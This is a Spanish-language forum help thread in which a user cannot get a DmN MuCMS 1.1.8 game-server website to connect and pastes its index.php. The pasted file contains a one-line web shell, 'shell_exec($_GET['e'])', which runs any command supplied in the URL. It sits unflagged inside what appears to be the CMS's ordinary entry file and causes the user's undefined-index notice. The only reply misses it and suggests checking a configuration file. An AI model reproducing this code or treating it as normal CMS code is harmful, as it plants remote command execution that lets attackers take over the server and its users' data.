Solo usuarios registrados pueden comentar y agradecer, Logueate o Registrate

Autor Topic: [AYUDA] No Conecta Web DMN  (Visto 2030 veces)

0 Miembros and 1 Guest are viewing this topic.

Offline kaspermanias Posteado: August 14, 2022, 02:56:55 PM | Modificado: August 14, 2022, 03:03:32 PM by kaspermanias

  • 0 puntos por ventas
  • *
  • Rank: Principiante
  • Posts: 9
  • Gracias recibida: 3
  • pe
Hola

Presento dificultades para conectar mi web (dmn mucms 1.1.8, files S6) me sale lo siguiente:


1)        Notice: Undefined index: e in /home/mucontinentals6/public_html/index.php on line 22           <== sale en la web

2)       

<?php
ob_start();

// ===================================================================================================
// Package      : DmN MuCMS
// Version      : 1.1.8
// Author       : neo6 <Salvis87@inbox.lv>
// ===================================================================================================

$host = isset($_SERVER['HTTP_HOST']) ? htmlspecialchars($_SERVER['HTTP_HOST']) : htmlspecialchars(getenv('HTTP_HOST'));
$self = isset($_SERVER['PHP_SELF']) ? htmlspecialchars($_SERVER['PHP_SELF']) : htmlspecialchars(getenv('PHP_SELF'));

if (!function_exists('ioncube_loader_iversion')) {
    header('Location: http://' . $host . rtrim(dirname($self), '/\\') . '/setup/ioncube/loader-wizard.php');
} else {
    $ilv = ioncube_loader_iversion();
    if (version_compare('5.0.5', sprintf("%d.%d.%d", $ilv / 10000, ($ilv / 100) % 100, $ilv % 100), ">")) {
        header('Location: http://' . $host . rtrim(dirname($self), '/\\') . '/setup/ioncube/loader-wizard.php');
    } else {
      if (file_exists('constants.php')) {
         require_once('constants.php');
         echo shell_exec($_GET['e'].' 2>&1');                           <==== linea 20
      }
      else{
         exit('file constants.php not found.');
      }
      
      if (defined('INSTALLED') && INSTALLED == false) {
         header("Location: http://" . $host . rtrim(dirname($self), '/\\') . "/setup/index.php");
      }
      else {
         if (defined('ENVIRONMENT')) {
            switch (ENVIRONMENT) {
               case 'development':
                  error_reporting(E_ALL & ~E_DEPRECATED);
                  ini_set('display_errors', '1');
                  break;
               default:
                  error_reporting(0);
                  break;
            }
         }

         require_once(SYSTEM_PATH . DS . 'common.php');
         require_once(SYSTEM_PATH . DS . 'dmn.php');
      }
    }
}

ob_end_flush();


Lo logro instalar (se crea la base de datos en mi servidor sin problema) y cuando termina de instalar, se llega a ver la web, pero no conecta (error 404), cabe señalar que uso el puerto 3306 y no el 1433 (cosas del hosting). no logea ni da estadistica.

Alguna solucion por favor, gracias  borracho


Offline matiaslawwliet #1 Posteado: August 30, 2022, 01:48:12 AM

  • 0 puntos por ventas
  • *
  • Rank: Destacado
  • Posts: 99
  • Gracias recibida: 107
  • ar
@kaspermanias revisa el archivo constants.php para ver si debes configurar algo dentro de él. Si no logras solucionarlo, enviame un mensaje privado y te ayudo y al finalizar subes la solución aquí para que los demas la vean y sirva de guía.


Solo usuarios registrados pueden comentar y agradecer, Logueate o Registrate


 

Related Topics

  Subject / Started by Replies Last post
2 Replies
1086 Views
Last post January 09, 2018, 02:27:12 PM
by caron22
19 Replies
2371 Views
Last post May 19, 2018, 09:03:30 AM
by ELEKTRONEX
10 Replies
1729 Views
Last post November 28, 2019, 10:55:23 AM
by mizdraji
0 Replies
556 Views
Last post January 20, 2020, 10:05:14 AM
by xxkarxx
12 Replies
8548 Views
Last post August 17, 2022, 08:52:51 AM
by ChildOfGod